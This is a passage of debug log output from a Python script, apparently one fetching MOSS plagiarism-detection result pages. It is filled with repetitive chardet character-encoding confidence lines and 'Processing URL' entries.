not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match26-top.html\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 21985\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match26-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match26-0.html\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5588585707638614\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 21998\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 21985\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match29-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match29-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match29-1.html\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 21985\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 21986\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 21985\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5290601551539237\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match31-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match31-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match31-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match35-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match35-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match35-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 36854\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 36841\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 36854\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 36841\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 36841\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 36842\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 36841\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.505\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5616347080687375\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match33-top.html\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5576615334671211\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match33-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match33-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match32-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match32-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match32-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match36-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match36-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match36-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19112\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 17972\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19581\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 17059\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19099\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 17959\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19568\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 17046\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 20457\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19112\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 17972\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 36854\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19581\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 17059\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 20444\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19099\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 17959\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 20457\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 17046\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 36841\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19099\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19568\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 17959\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 20444\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 17046\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 36854\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19100\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19568\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 17960\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 20444\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 17047\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19099\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 36841\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19569\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 17959\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 20445\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 17046\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 36841\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19568\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 20444\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 36842\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 36841\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5296828800687878\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5195853478593226\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5283924269621537\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5617151864622184\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5486536472346186\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5456726203364073\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match39-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match39-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match39-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match38-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match38-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match38-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match37-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match37-0.html\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match37-1.html\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5284853688625339\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match34-top.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 24477\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 32476\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 24464\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 24477\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 32463\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 24464\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 32476\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 24464\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 32463\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 24465\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 32463\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 24464\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 32464\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 